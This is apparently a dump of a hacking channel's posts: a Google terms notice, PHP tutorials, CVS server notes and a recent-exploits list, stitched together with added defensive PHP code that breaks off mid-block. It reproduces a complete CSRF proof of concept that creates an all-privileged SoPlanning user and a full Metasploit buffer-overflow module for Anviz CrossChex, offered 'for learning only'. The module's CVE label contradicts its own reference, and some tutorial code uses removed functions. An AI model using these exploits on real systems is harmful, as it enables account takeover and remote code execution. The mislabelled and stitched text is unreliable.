UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 google.com now has new terms, 20-Feb-2020

>These terms help define the relationship between you and Google. Broadly speaking, we give you permission to use our services if you agree to follow these terms, which reflect how Google’s business works and how we earn money. When we speak of “Google,” “we,” “us,” and “our,” we mean Google LLC and its affiliates.

>We provide a broad range of services that are subject to these terms, including:

1) apps and sites (like Search and Maps)

2) platforms (like Google Play)

3) integrated services (like Maps embedded in other companies’ apps or sites)

4) devices (like Google Home)

>Our services are designed to work together, making it easier for you to move from one activity to the next. For example, Maps can remind you to leave for an appointment that appears in your Google Calendar.

SEE MORE ON Google Website
> https://policies.google.com/terms/update?utm_source=hpp&utm_medium=pushdown&utm_campaign=tosso


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 exploit: Cross-Site Request Forgery (Add User)
# Date: 2020-02-14

> The SoPlanning 1.45 application is vulnerable to CSRF that allows for arbitrary
> user creation and for changing passwords (specifically the admin password).

🦑 PoC for arbitrary user creation:
# CSRF POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://10.22.6.208/soplanning/www/process/xajax_server.php" method="POST">
<input type="hidden" name="xajax" value="submitFormUser" />
<input type="hidden" name="xajaxr" value="1581700271752" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="Testing" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="1" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="Testing" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="test&#64;test&#46;com" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="Test" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="test" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="&#35;FFFFFF" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="<xjxobj><e><k>0<&#47;k><v>users&#95;manage&#95;all<&#47;v><&#47;e><e><k>1<&#47;k><v>projects&#95;manage&#95;all<&#47;v><&#47;e><e><k>2<&#47;k><v>projectgroups&#95;manage&#95;all<&#47;v><&#47;e><e><k>3<&#47;k><v>tasks&#95;modify&#95;all<&#47;v><&#47;e><e><k>4<&#47;k><v>tasks&#95;view&#95;all&#95;projects<&#47;v><&#47;e><e><k>5<&#47;k><v>tasks&#95;view&#95;all&#95;users<&#47;v><&#47;e><e><k>6<&#47;k><v>lieux&#95;all<&#47;v><&#47;e><e><k>7<&#47;k><v>ressources&#95;all<&#47;v><&#47;e><e><k>8<&#47;k><v>audit&#95;restore<&#47;v><&#47;e><e><k>9<&#47;k><v>parameters&#95;all<&#47;v><&#47;e><e><k>10<&#47;k><v>stats&#95;users<&#47;v><&#47;e><e><k>11<&#47;k><v>stats&#95;projects<&#47;v><&#47;e><&#47;xjxobj>" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="<xjxobj><&#47;xjxobj>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

🦑 Use this exploit for learning only
Written by UndercOde
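
A server-side check that would reject the forged form above, as an added example (not SoPlanning's code and not part of the original post). The csrf_token field, the function names and the soplanning.example origin are hypothetical; only xajax and submitFormUser come from the PoC.

```php
<?php
// Added example, not SoPlanning code. Hypothetical: the csrf_token field, the
// function names and the soplanning.example origin. "xajax"/"submitFormUser"
// are the field and call name used by the PoC form.

function csrf_issue_token(array &$session): string
{
    // One unpredictable token per session; the app embeds it in every form it renders.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function origin_of(string $url): ?string
{
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) {
        return null;                       // empty header, "null", relative URL
    }
    $origin = strtolower($p['scheme'] . '://' . $p['host']);
    return isset($p['port']) ? $origin . ':' . $p['port'] : $origin;
}

/** Returns [allowed, reason] for one request. */
function csrf_check(array $session, array $server, array $post, string $appOrigin): array
{
    $method = strtoupper($server['REQUEST_METHOD'] ?? '');
    if ($method === 'GET' || $method === 'HEAD') {
        return [true, 'safe method, must not change state'];
    }
    // 1) The request has to originate from the application's own pages.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if (origin_of($source) !== $appOrigin) {
        return [false, 'cross-origin or unknown origin'];
    }
    // 2) It has to carry the session's token; hash_equals() compares in constant time.
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($supplied) || !hash_equals($expected, $supplied)) {
        return [false, 'missing or wrong CSRF token'];
    }
    return [true, 'ok'];
}

// --- Constructed requests; run with: php csrf_check.php ---
$session = [];
$token   = csrf_issue_token($session);
$app     = 'http://soplanning.example';
$cases = [
    // What the victim's browser sends when the PoC form is submitted.
    'forged'   => [['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://attacker.example'],
                   ['xajax' => 'submitFormUser', 'xajaxargs' => ['Testing', '', '1']]],
    // Same-origin request that lacks the token.
    'no-token' => [['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $app],
                   ['xajax' => 'submitFormUser']],
    // Form rendered by the application itself.
    'genuine'  => [['REQUEST_METHOD' => 'POST', 'HTTP_REFERER' => $app . '/some/page'],
                   ['xajax' => 'submitFormUser', 'csrf_token' => $token]],
];
foreach ($cases as $name => [$server, $post]) {
    [$ok, $why] = csrf_check($session, $server, $post, $app);
    printf("%-8s %s (%s)\n", $name, $ok ? 'ALLOW' : 'DENY', $why);
}
```

Setting the session cookie with SameSite=Lax or Strict adds a second layer, because the browser then withholds the cookie from a cross-site POST.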
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Recent 2020 exploits / CVEs:

Date | Title | Type | Platform | Author
2020-02-19 | DBPower C300 HD Camera - Remote Configuration Disclosure | WebApps | Hardware | Todor Donev
2020-02-19 | Virtual Freer 1.58 - Remote Command Execution | WebApps | PHP | SajjadBnd
2020-02-17 | Anviz CrossChex - Buffer Overflow (Metasploit) | Remote | Windows | Metasploit
2020-02-17 | LabVantage 8.3 - Information Disclosure | WebApps | Java | Joel Aviad Ossi
2020-02-17 | SOPlanning 1.45 - 'users' SQL Injection | WebApps | PHP | J3rryBl4nks
2020-02-17 | Cuckoo Clock v5.0 - Buffer Overflow | Local | Windows | boku
2020-02-17 | SOPlanning 1.45 - Cross-Site Request Forgery (Add User) | WebApps | PHP | J3rryBl4nks
2020-02-17 | TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path | Local | Windows | boku
2020-02-17 | WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting | WebApps | PHP | Ultra Security Team
2020-02-17 | Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User) | WebApps | PHP | J3rryBl4nks
2020-02-17 | DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path | Local | Windows | boku
2020-02-17 | MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation | Local | Windows | nu11secur1ty

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to grab and analyse a file
2 parts:

1) Grabbing and analyzing a file is very simple. This tutorial will guide you through it step by step with an example. Let's start!

2) First, we have to decide which URL to crawl. It can be set in the script or passed in $QUERY_STRING. For simplicity, let's set the variable directly in the script.

<?php
$url = 'http://www.php.net';
?>

3) In the second step, we fetch the specified file and store it in an array with the file() function.

<?php
$url = 'http://www.php.net';
// file() returns the document as an array with one element per line
$lines_array = file($url);
?>

4) OK, now the file is in the array. However, the text we want to analyze may not all be on one line. To work with the file, we can simply convert the array $lines_array into a string, using the implode(x, y) function. If you later want to use explode() (which splits a string into an array), it may be better to set x to "|", "!" or a similar delimiter. But for our purposes, it is best to set x to a space. y is the other required parameter: it is the array you want implode() to process.

<?php
$url = 'http://www.php.net';
$lines_array = file($url);
// join the lines back into one string
$lines_string = implode('', $lines_array);
?>

5) Now that the fetching is done, it is time to analyze the result. For the purpose of this example, we want to get everything between <head> and </head>. To parse that out of the string, we also need something called a regular expression.

<?php
$url = 'http://www.php.net';
$lines_array = file($url);
$lines_string = implode('', $lines_array);
// eregi() was removed in PHP 7.0; preg_match() with the /i flag replaces it on current PHP
eregi("<head>(.*)</head>", $lines_string, $head);
?>

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to grab and analyse a file
Part 2:

1) Let's take a look at the code. As you can see, the eregi() function is called in the following format:

eregi("<head>(.*)</head>", $lines_string, $head);

2) "(.*)" means "everything", so the call can be read as "capture everything between <head> and </head>". $lines_string is the string we are analyzing, and $head is the array where the results are stored.

3) Finally, we can output the data. Because there is only one <head> ... </head> pair, we can safely assume that there is only one element in the array, and that it is the one we want. Let's print it out.

<?php
$url = 'http://www.php.net';
$lines_array = file($url);
$lines_string = implode('', $lines_array);
// eregi() was removed in PHP 7.0; preg_match() with the /i flag replaces it on current PHP
eregi("<head>(.*)</head>", $lines_string, $head);
echo $head[0];
?>

4) That's all there is to it.

<?php
$url = 'http://www.php.net';
$lines_array = file($url);
$lines_string = implode('', $lines_array);
// [^>]* also matches a <body> tag that has no attributes
preg_match_all("/<body([^>]*)>(.*)<\/body>/is", $lines_string, $m);
// <xmp> makes the browser show the captured markup as text
echo "<xmp>";
echo $m[2][0];
?>

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Crawl and analyse a simple file :)

It is very simple to scrape and analyze a file. This tutorial will guide you through it step by step with an example. Let's start!

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋

1) First, we have to decide which URL to crawl. It can be set in the script or passed in $QUERY_STRING. For simplicity, let's set the variable directly in the script.

<?php
$url = 'http://www.php.net';
?>

2) In the second step, we grab the specified file and store it in an array using the file() function.

<?php
$url = 'http://www.php.net';
// file() returns the document as an array with one element per line
$lines_array = file($url);
?>

3) OK, now the file is in the array. However, the text we want to analyze may not all be on one line. To work with the file, we can simply convert the array $lines_array into a string, using the implode(x, y) function. If you later want to use explode() (which splits a string into an array), it may be better to set x to "|", "!" or a similar delimiter. But for our purposes, it is best to set x to a space. y is the other required parameter: it is the array you want implode() to process.

<?php
$url = 'http://www.php.net';
$lines_array = file($url);
// join the lines back into one string
$lines_string = implode('', $lines_array);
?>

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Crawl and analyse a simple file, part 2:

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋

1) Now that the crawling is done, it's time to analyze the result. For the purpose of this example, we want to get everything between <head> and </head>. To parse that out of the string, we also need something called a regular expression.

<?php
$url = 'http://www.php.net';
$lines_array = file($url);
$lines_string = implode('', $lines_array);
// eregi() was removed in PHP 7.0; preg_match() with the /i flag replaces it on current PHP
eregi("<head>(.*)</head>", $lines_string, $head);
?>

2) Let's take a look at the code. As you can see, the eregi() function is called in the following format:

eregi("<head>(.*)</head>", $lines_string, $head);

"(.*)" means "everything", so the call can be read as "capture everything between <head> and </head>". $lines_string is the string we are analyzing, and $head is the array where the results are stored.

3) Finally, we can output the data. Because there is only one <head> ... </head> pair, we can safely assume that there is only one element in the array, and that it is the one we want. Let's print it out.

<?php
$url = 'http://www.php.net';
$lines_array = file($url);
// $lines_string must be built before it is searched
$lines_string = implode('', $lines_array);
eregi("<head>(.*)</head>", $lines_string, $head);
echo $head[0];
?>

This is all the code.

Written by UndercOde
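
Both versions of the tutorial above pass a URL straight to file() and echo what comes back; when that URL arrives in $QUERY_STRING, file() opens local paths and internal hosts as readily as public sites. As an added example (not the tutorial's code), the following validates the URL first, caps the download, parses <head> with DOMDocument instead of a regular expression and escapes the output. The function names, DNS answers and sample page are constructed for illustration.

```php
<?php
// Added example, not the tutorial's code. Function names, DNS answers and the
// sample page are constructed. Needs PHP >= 7.4 with the dom extension.

/** Accept only http(s) URLs whose host resolves to public IP addresses. */
function is_safe_fetch_url(string $url, ?callable $resolver = null): bool
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return false;                        // plain paths such as /etc/passwd
    }
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return false;                        // file://, php://, ftp://, ...
    }
    if (isset($p['user']) || isset($p['pass'])) {
        return false;                        // userinfo tricks: http://a@b/
    }
    $host     = trim($p['host'], '[]');      // IPv6 literals arrive bracketed
    $resolver = $resolver ?? 'gethostbynamel';
    $ips   = filter_var($host, FILTER_VALIDATE_IP) ? [$host] : ($resolver($host) ?: []);
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    foreach ($ips as $ip) {
        // Loopback, RFC 1918, link-local and reserved targets are refused.
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return false;
        }
    }
    return $ips !== [];
}

/** Fetch with a timeout, no redirects and a size cap; file() has none of these. */
function fetch_limited(string $url, int $maxBytes = 1048576): string
{
    $ctx  = stream_context_create(['http' => ['timeout' => 5, 'follow_location' => 0]]);
    $body = @file_get_contents($url, false, $ctx, 0, $maxBytes);
    if ($body === false) {
        throw new RuntimeException("fetch failed: $url");
    }
    return $body;
}

/** Return the serialized <head> element, or null when there is none. */
function extract_head(string $html): ?string
{
    if (trim($html) === '') {
        return null;
    }
    $doc  = new DOMDocument();
    $prev = libxml_use_internal_errors(true);    // tolerate real-world tag soup
    $ok   = $doc->loadHTML($html, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    $head = $ok ? $doc->getElementsByTagName('head')->item(0) : null;
    return $head ? $doc->saveHTML($head) : null;
}

// --- Demo on constructed data; nothing here touches the network ---
$dns = ['www.php.net' => ['93.184.216.34'], 'intranet.example' => ['10.0.0.5']];
$fakeResolver = fn(string $h) => $dns[$h] ?? false;
$candidates = ['http://www.php.net', '/etc/passwd', 'file:///etc/passwd',
               'http://169.254.169.254/', 'http://intranet.example/'];
foreach ($candidates as $u) {
    printf("%-28s %s\n", $u, is_safe_fetch_url($u, $fakeResolver) ? 'fetch' : 'refuse');
}

// $page stands in for fetch_limited($url), called only after the check passes.
$page = "<html><head>\n<title>Demo</title>\n<script>alert(1)</script>\n</head>"
      . "<body class=\"x\"><p>hi</p></body></html>";
// Escape before echoing: fetched markup is shown as text, not run by the browser.
echo htmlspecialchars((string) extract_head($page), ENT_QUOTES, 'UTF-8'), "\n";
```

The address check and the later fetch resolve the host name separately, so a production fetcher should connect to the address it validated.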
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Seven elements of being a successful programmer

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋

1) First, low commitment, high realization: If your commitment is indeed what the manager wants to hear, he will like you. However, he will not like you any more if the software is not delivered in a timely manner as promised.

2) Second, don't put errors in software: Good programmers don't put errors in their code.

3) Third, full of enthusiasm and hard work: Excellent programmers are full of enthusiasm and hard work, they are highly organized, and pay attention to methods, they have the ability to structure things. Moreover, the enthusiasm of most programmers for their hard work is incredible.

4) Fourth, know the unknown factors.

5) Fifth, get along well with team members: Software development is the result of team members' coordinated efforts.

6) Six, good beginning, good end, towards the ultimate goal: always working towards the ultimate goal is a very important ability. When interviewing someone for work, one thing you're looking for is the work he actually participated in on the product the group has already delivered.

7) Seven, learning the emerging technology: Excellent developers are people who are eager to learn.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Now: Microsoft releases security update for Windows 7 due to severe IE vulnerability 😁

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋

1) Microsoft releases a security update for Windows 7 due to a severe IE vulnerability.

2) Both Windows 7 and the IE browser went out of support last month, but because of the latest serious IE vulnerability, Microsoft decided to provide security patches for Windows 7 again. After discovering a JavaScript engine vulnerability that was widely exploited by hackers, Microsoft decided to provide security updates for all older browsers before IE

3) This remote code execution vulnerability exists in the way the IE scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user.

4) If the current user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights.

5) In a web-based attack scenario, an attacker could create a specially crafted website that exploits the IE vulnerability, and then convince users to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. Attackers may also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites may contain specially crafted content that could exploit this vulnerability.

6) The exploit can be triggered by any application that can host HTML, such as documents or PDFs, and has a "critical" rating on Windows 7, 8.1, and 10, and is currently widely used by hackers. Microsoft will release patches for all of these operating systems as well as Windows

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Windows 7 back to life 🥳
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Make an XBM picture
XBM is a simple two-color bitmap image format. It was used mostly by early CGI scripts and is used here for a counter.
By UndercOde

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋

<?php
setXBM(1234567890, 0);

// Print the digits of $num as an XBM image; a non-zero $mode inverts the colours.
function setXBM($num, $mode = 0) {
    settype($num, "string");
    $mode = $mode ? 0xff : 0x00;
    $int_width = strlen($num); // digits
    $count_width = 8; // single number width
    $count_height = 16; // height

    // One 8x16 glyph per digit, one byte per pixel row
    $bitmap = array(
        0 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
        1 => array(0xff, 0xff, 0xff, 0xcf, 0xc7, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xff, 0xff, 0xff),
        2 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xcf, 0xe7, 0xf3, 0xf9, 0xf9, 0x81, 0xff, 0xff, 0xff),
        3 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xc7, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
        4 => array(0xff, 0xff, 0xff, 0xcf, 0xcf, 0xc7, 0xc7, 0xcb, 0xcb, 0xcd, 0x81, 0xcf, 0x87, 0xff, 0xff, 0xff),
        5 => array(0xff, 0xff, 0xff, 0x81, 0xf9, 0xf9, 0xf9, 0xc1, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
        6 => array(0xff, 0xff, 0xff, 0xc7, 0xf3, 0xf9, 0xf9, 0xc1, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
        7 => array(0xff, 0xff, 0xff, 0x81, 0x99, 0x9f, 0x9f, 0xcf, 0xcf, 0xe7, 0xe7, 0xf3, 0xf3, 0xff, 0xff, 0xff),
        8 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0xc3, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
        9 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x83, 0x9f, 0x9f, 0xcf, 0xe3, 0xff, 0xff, 0xff)
    );

    echo "#define counter_width " . ($count_width * $int_width) . "\r\n";
    echo "#define counter_height " . $count_height . "\r\n";
    echo "static unsigned char counter_bits[] = {\r\n";
    for ($i = 0; $i < $count_height; ++$i) {
        for ($j = 0; $j < $int_width; ++$j) {
            // %02x zero-pads, so 0x00 is not printed as "0x 0"
            printf("0x%02x, ", $bitmap[$num[$j]][$i] ^ $mode);
        }
    }
    echo "};\r\n"; // close the C array so the XBM is complete
}
?>

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 String manipulation functions
There are many string manipulation functions in PHP 3.0; the most important are the following:

1) echo, print, printf, sprintf

are used to output strings. If there is a variable name in the string, it is replaced with its value. The latter two functions are similar to the C functions of the same name.

2) strchr, strlen, strtok, strrchr, strrev, strstr, strtolower, strtoupper, substr, ucfirst

are string manipulation functions; some of them have exactly the same meaning as the C functions of the same name. strrev reverses a string. strtolower and strtoupper convert the string to lowercase and uppercase. ucfirst converts the first character of the string to uppercase. substr returns a substring of the string; usage: substr(String, head, length). The head position is counted from 0. If it is negative, it counts backwards from the end of the string.

3) Chr, Ord

Functions with the same name.

4) explode, implode, join

Functions related to arrays. explode(string, delimiter) returns an array produced by splitting a string at a delimiter. implode(array, delimiter) returns the string produced by inserting a delimiter between the elements of an array. implode and join have the same meaning.

5) Chop

Removes trailing white space.

6) htmlspecialchars

Converts HTML special characters into their entity names, such as "<" to "&lt;".

7) nl2br

Adds "<BR>" in front of each carriage return in HTML.

8) AddSlashes, StripSlashes

Add "\" to and remove "\" from the string as required. For some databases, the characters to be queried must have "\" added or removed before they can be queried.

9) parse_str

Parses strings of the form "name1=value1&name2=value2&..." into variables.

> For example: parse_str("a=1&b=2"); generates the variables $a and $b with the values 1 and 2. If two name/value pairs have the same name, the later value overwrites the earlier one. If the name carries "[]", such as "a[]=

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Anviz CrossChex - Buffer Overflow (Metasploit)
CVE-2020-2019 exploit ☠️
Tested by UndercOde on Windows 10:

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
PACKET_LEN = 10

include Msf::Exploit::Remote::Udp

def initialize(info = {})
super(update_info(info,
'Name' => 'Anviz CrossChex Buffer Overflow',
'Description' => %q{
Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
triggering a stack buffer overflow.
},
'Author' =>
[
'Luis Catarino <lcatarino@protonmail.com>', # original discovery/exploit
'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit
'agalway-r7', # Module creation
'adfoster-r7' # Module creation
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-12518'],
['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
['EDB', '47734']
],
'Payload' =>
{
'Space' => 8947,
'DisableNops' => true
},
'Arch' => ARCH_X86,
'EncoderType' => Msf::Encoder::Type::Raw,
'Privileged' => true,
'Platform' => 'win',
'DisclosureDate' => '2019-11-28',
'Targets' =>
[
[
'Crosschex Standard x86 <= V4.3.12',
{
'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
'Shift' => 4 # Positions payload to be written at beginning of ESP
}
]
],
'DefaultTarget' => 0
))
deregister_udp_options
register_options(
[
Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
])
end

def exploit
connect_udp

res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))
if res.empty?
fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
end

print_status "CrossChex broadcast received, sending payload in response"
sploit = rand_text_english(target['Offset'])
sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
sploit << payload.encoded

udp_sock.sendto(sploit, host, port)
print_status "Payload sent"
end
end
Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Use for learning, not to harm or steal
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Linux as a CVS server, part two

1) Backing up and moving the software library

Backing up the software library files is no different from backing up other files, but the backup tool needs to lock CVS, and you must first log in as a user who can read the software library. To lock the CVS software library, you need to edit the '#cvs.rfl' file.

2) When you want to use a backed-up software library to restore the original library, and the original library has changed since the backup, CVS will report an error. You must follow the steps below:

> Get a new working directory.

3) Copy the files that failed the last commit (of course, you can't copy the files in the CVS directories).

4) Work in the new directory and use cvs update, cvs diff and similar commands to show the changes. Use cvs commit to save the changes to the software library.

5) Moving a software library to another place is also very simple. The easiest way is to create a new working directory for the moved library. If you want to reuse the original directory, you have to modify 'CVS/Repository' and 'CVS/Root' by hand; unless you are good at this, it is not recommended.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 CVS remote user management by UndercOde:

1) A CVS server should meet two requirements. First, ensure that the software library has enough space. Second, ensure that there is no less than 32M of memory. The server generates two processes for each user who connects to it.

2) The cost of the child process is small. But if the network bandwidth is not enough, the cost of the parent process is enormous.

3) Another big cost is diffing files; with large source files, the cost of the comparison is also great.

🦑 Remote user login authentication methods

> Using rsh for routine remote login

1) The CVS server should use rsh to allow users to connect. The .rhosts file should be configured.

2) Assume that the user tom on the remote host tom.exsample.com needs to connect to the CVS server funame.simple.com to work. On the server, the .rhosts file in the bach directory should be edited. Add:

> tom.exsample.com tom

> On the client, run: rsh -l bach funame.simple.com 'echo $PATH'

3) This makes sure that you can connect to the CVS server; the client should write the displayed path to .bashrc or .cshrc (instead of .login or .profile).

4) In addition, the client can also define the environment variable CVS_SERVER to define the location of the host. On the server side, modify the /etc/inetd.conf file to tell the server to run the CVS server when a connection arrives on a specific port.

5) The default value of this port number is 2401. Of course, so that it does not have to be set every time you use it, you can define the environment variable CVS_AUTH_PORT on the client. To enable the service, just add the following line to the /etc/inetd.conf file:

> 2401 stream tcp nowait root /usr/local/bin/cvs cvs -f --allow-root=/cvsroot pserver

6) You can also use the -T option to define the temporary directory.

--allow-root defines the software libraries available to users. If there are several software libraries on the server, this option needs to be repeated. In addition, internal users can define the environment variable CVSROOT like this:

:pserver:usr@funam.simple.com:/cvsroot

7) Here usr is the username (on Linux), funam.simple.com is the CVS server, and /cvsroot is assumed to be the directory name of the software library. A remote user can use the following form:

:ext:pserver:usr@funam.simple.com:/cvsroot

:ext: marks a remote user; the rest is the same as above.

8) If the client's inetd is invoked through the general services mechanism, just add the following line to /etc/services:

cvspserver 2401/tcp

Restart inetd so that it rereads its initialization files.

9) CVS user management. By default (as with a telnet login), CVS uses the same user names and passwords as the Linux system. That is: as long as you can log in to the Linux system, you have read-only permission for $CVSROOT. Of course, a software developer must have read-write permission for the corresponding directory to upgrade the source code and complete other tasks. Therefore CVS also provides its own user authentication system to manage users more conveniently.

10) On the server side, there can be a passwd file under $CVSROOT/CVSROOT (which can be defined with the environment variable CVS_PASSFILE) to record CVS user information. It uses the same layout as the Linux /etc/passwd file. Likewise, its passwords are encrypted with the standard Linux method. Here is the content of a passwd file:

anyone:

tom:xyzkue

mary:yuio:pubcvs

11) The first line means that no password is required when you log in as anyone, even if you type an empty string; of course, what you get this way may be read-only rights. The second line means that tom needs to enter a password when logging in; the password is stored encrypted as xyzkue. After logging in this way, generally higher permissions can be obtained

Written by UndercOde
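
An added example (not part of CVS or of the original post): a small PHP audit of the $CVSROOT/CVSROOT/passwd layout described above, flagging the entries an administrator should review. The function name and findings are hypothetical; the first three sample lines are the ones from the post and the fourth, with a 13-character DES-style hash, is constructed.

```php
<?php
// Added example, not part of CVS. audit_cvs_passwd() is a hypothetical helper.
// Expected layout per line: cvsuser:crypt-hash[:system-user]

function audit_cvs_passwd(string $text): array
{
    $findings = [];
    foreach (preg_split('/\R/', $text) as $i => $raw) {
        $line = trim($raw);
        if ($line === '') {
            continue;
        }
        $fields = explode(':', $line);
        $user   = $fields[0];
        $where  = 'line ' . ($i + 1) . " ($user)";
        if (count($fields) < 2 || count($fields) > 3) {
            $findings[] = "$where: malformed entry";
            continue;
        }
        $hash    = $fields[1];
        $sysUser = $fields[2] ?? '';

        if ($hash === '') {
            // The "anyone:" case from the post: any or no password is accepted.
            $findings[] = "$where: empty password field, login needs no password";
        } elseif ($hash[0] === '$') {
            // Modular crypt formats ($1$, $5$, $6$ ...): nothing to report.
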